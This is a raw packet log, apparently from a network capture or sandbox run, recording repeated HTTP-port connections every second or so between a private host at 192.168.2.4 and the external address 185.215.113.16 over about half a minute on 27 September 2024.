Sep 27, 2024 19:05:41.473840952 CEST	80	62792	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:41.473915100 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.475071907 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.479903936 CEST	80	62792	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:41.698685884 CEST	80	62792	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:41.698765039 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.807075977 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.807632923 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.812213898 CEST	80	62792	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:41.812315941 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.812424898 CEST	80	62793	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:41.812521935 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.812711000 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:41.817646980 CEST	80	62793	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:42.527532101 CEST	80	62793	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:42.527673006 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.529194117 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.534122944 CEST	80	62793	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:42.753321886 CEST	80	62793	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:42.753424883 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.869093895 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.869426012 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.874299049 CEST	80	62794	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:42.874392986 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.874525070 CEST	80	62793	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:42.874540091 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.874572992 CEST	62793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:42.879621983 CEST	80	62794	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:43.610168934 CEST	80	62794	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:43.610276937 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.610893011 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.616072893 CEST	80	62794	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:43.850919962 CEST	80	62794	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:43.851011038 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.962996960 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.963340998 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.968183994 CEST	80	62795	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:43.968240976 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.968246937 CEST	80	62794	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:43.968292952 CEST	62794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.968508959 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:43.973299026 CEST	80	62795	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:44.759453058 CEST	80	62795	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:44.759520054 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:44.760080099 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:44.766943932 CEST	80	62795	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:44.989880085 CEST	80	62795	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:44.989955902 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.103452921 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.103775978 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.110868931 CEST	80	62796	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:45.110884905 CEST	80	62795	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:45.110954046 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.110975981 CEST	62795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.111076117 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.116956949 CEST	80	62796	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:45.839206934 CEST	80	62796	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:45.839490891 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.841726065 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:45.846528053 CEST	80	62796	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:46.076545954 CEST	80	62796	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:46.076689005 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.233059883 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.233400106 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.238347054 CEST	80	62797	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:46.238409996 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.238589048 CEST	80	62796	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:46.238616943 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.238631010 CEST	62796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.243571043 CEST	80	62797	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:46.949131012 CEST	80	62797	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:46.949212074 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.949901104 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:46.954767942 CEST	80	62797	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:47.230307102 CEST	80	62797	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:47.230501890 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:47.337852001 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:47.338160992 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:47.343025923 CEST	80	62797	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:47.343111992 CEST	62797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:47.343120098 CEST	80	62798	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:47.343194008 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:47.343358994 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:47.348347902 CEST	80	62798	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:48.145020008 CEST	80	62798	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:48.145160913 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.146502018 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.151433945 CEST	80	62798	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:48.478024006 CEST	80	62798	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:48.478137016 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.588463068 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.588959932 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.595015049 CEST	80	62799	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:48.595027924 CEST	80	62798	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:48.595079899 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.595105886 CEST	62798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.595351934 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:48.601376057 CEST	80	62799	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:49.380398035 CEST	80	62799	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:49.380518913 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.381222963 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.388564110 CEST	80	62799	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:49.619226933 CEST	80	62799	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:49.619313955 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.728435993 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.728864908 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.733895063 CEST	80	62799	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:49.733907938 CEST	80	62800	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:49.734015942 CEST	62799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.734049082 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.734205961 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:49.739151955 CEST	80	62800	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:50.444812059 CEST	80	62800	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:50.444907904 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.445610046 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.450404882 CEST	80	62800	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:50.675717115 CEST	80	62800	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:50.675889015 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.793389082 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.793804884 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.798446894 CEST	80	62800	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:50.798557043 CEST	62800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.798618078 CEST	80	62801	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:50.798722982 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.799154997 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:50.803956032 CEST	80	62801	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:51.523658991 CEST	80	62801	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:51.523780107 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.531505108 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.536391020 CEST	80	62801	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:51.774765015 CEST	80	62801	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:51.774848938 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.889991045 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.897115946 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.898139000 CEST	80	62801	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:51.898212910 CEST	62801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.904714108 CEST	80	62802	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:51.904788971 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.905113935 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:51.912579060 CEST	80	62802	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:52.628562927 CEST	80	62802	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:52.628659010 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.631453991 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.636219025 CEST	80	62802	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:52.860121012 CEST	80	62802	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:52.860202074 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.963134050 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.963495016 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.968414068 CEST	80	62802	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:52.968432903 CEST	80	62803	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:52.968513966 CEST	62802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.968574047 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.968869925 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:52.973653078 CEST	80	62803	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:53.698178053 CEST	80	62803	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:53.698286057 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:53.699625969 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:53.704343081 CEST	80	62803	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:53.929639101 CEST	80	62803	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:53.929778099 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.041245937 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.041563988 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.046402931 CEST	80	62804	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:54.046473980 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.046557903 CEST	80	62803	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:54.046569109 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.046611071 CEST	62803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.051338911 CEST	80	62804	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:54.745338917 CEST	80	62804	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:54.745434999 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.746146917 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:54.752023935 CEST	80	62804	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:54.971054077 CEST	80	62804	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:54.971189976 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.087827921 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.088186026 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.093020916 CEST	80	62804	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:55.093055010 CEST	80	62805	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:55.093099117 CEST	62804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.093159914 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.093302011 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.098129988 CEST	80	62805	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:55.843205929 CEST	80	62805	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:55.843477964 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.844485044 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:55.849307060 CEST	80	62805	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:56.087116957 CEST	80	62805	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:56.087270021 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.197274923 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.197678089 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.202677965 CEST	80	62805	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:56.202697039 CEST	80	62806	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:56.202801943 CEST	62805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.202864885 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.203016043 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.207928896 CEST	80	62806	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:56.902156115 CEST	80	62806	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:56.902345896 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.903167963 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:56.908030987 CEST	80	62806	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:57.127599001 CEST	80	62806	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:57.127656937 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:57.288700104 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:57.289057970 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:57.293999910 CEST	80	62807	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:57.294019938 CEST	80	62806	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:57.294151068 CEST	62806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:57.294159889 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:57.294256926 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:57.299016953 CEST	80	62807	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:58.009450912 CEST	80	62807	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:58.009514093 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.013398886 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.019777060 CEST	80	62807	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:58.241193056 CEST	80	62807	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:58.241367102 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.353387117 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.353693008 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.358504057 CEST	80	62808	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:58.358526945 CEST	80	62807	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:58.358589888 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.358613014 CEST	62807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.358745098 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:58.363461971 CEST	80	62808	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:59.068933010 CEST	80	62808	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:59.069017887 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.069833994 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.074707985 CEST	80	62808	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:59.292927980 CEST	80	62808	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:59.293025970 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.400486946 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.400832891 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.405703068 CEST	80	62809	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:59.405726910 CEST	80	62808	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:59.405792952 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.405827999 CEST	62808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.405945063 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:59.410741091 CEST	80	62809	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:00.154752970 CEST	80	62809	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:00.154907942 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.197983027 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.202817917 CEST	80	62809	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:00.427018881 CEST	80	62809	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:00.427112103 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.557238102 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.557646036 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.562474966 CEST	80	62810	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:00.562494993 CEST	80	62809	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:00.562560081 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.562597990 CEST	62809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.562807083 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:00.567836046 CEST	80	62810	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:01.278086901 CEST	80	62810	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:01.278213978 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.278971910 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.283811092 CEST	80	62810	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:01.509730101 CEST	80	62810	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:01.509919882 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.620182991 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.620982885 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.625360966 CEST	80	62810	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:01.625525951 CEST	62810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.625777960 CEST	80	62811	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:01.625894070 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.626106024 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:01.631098032 CEST	80	62811	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:02.344595909 CEST	80	62811	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:02.344727039 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.347218990 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.353957891 CEST	80	62811	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:02.577826977 CEST	80	62811	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:02.577980995 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.683489084 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.683990955 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.688657999 CEST	80	62811	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:02.688846111 CEST	62811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.688860893 CEST	80	62812	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:02.688951969 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.689042091 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:02.693803072 CEST	80	62812	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:03.398214102 CEST	80	62812	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:03.398315907 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.427120924 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.432066917 CEST	80	62812	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:03.654206991 CEST	80	62812	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:03.654392958 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.809855938 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.810291052 CEST	62813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.815224886 CEST	80	62813	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:03.815294027 CEST	62813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.815367937 CEST	80	62812	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:03.815423012 CEST	62812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.815668106 CEST	62813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:03.820621014 CEST	80	62813	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:04.521752119 CEST	80	62813	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:04.521847963 CEST	62813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:04.525974989 CEST	62813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:04.526449919 CEST	62814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:04.531280041 CEST	80	62814	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:04.531364918 CEST	62814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:04.531445026 CEST	80	62813	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:04.531496048 CEST	62813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:04.531641006 CEST	62814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:04.536448956 CEST	80	62814	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:05.255327940 CEST	80	62814	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:05.255389929 CEST	62814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:05.371669054 CEST	62814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:05.372046947 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:05.377795935 CEST	80	62815	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:05.377859116 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:05.378062010 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:05.379738092 CEST	80	62814	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:05.379787922 CEST	62814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:05.383605003 CEST	80	62815	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:06.108616114 CEST	80	62815	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:06.111844063 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:06.803221941 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:06.808178902 CEST	80	62815	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.038024902 CEST	80	62815	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.038142920 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.152688980 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.152981043 CEST	62816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.158607960 CEST	80	62815	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.158864021 CEST	62815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.158865929 CEST	80	62816	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.158926010 CEST	62816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.159190893 CEST	62816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.164413929 CEST	80	62816	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.860096931 CEST	80	62816	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.862162113 CEST	62816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.864720106 CEST	62816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.865041018 CEST	62817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.869894981 CEST	80	62816	185.215.113.16	192.168.2.4
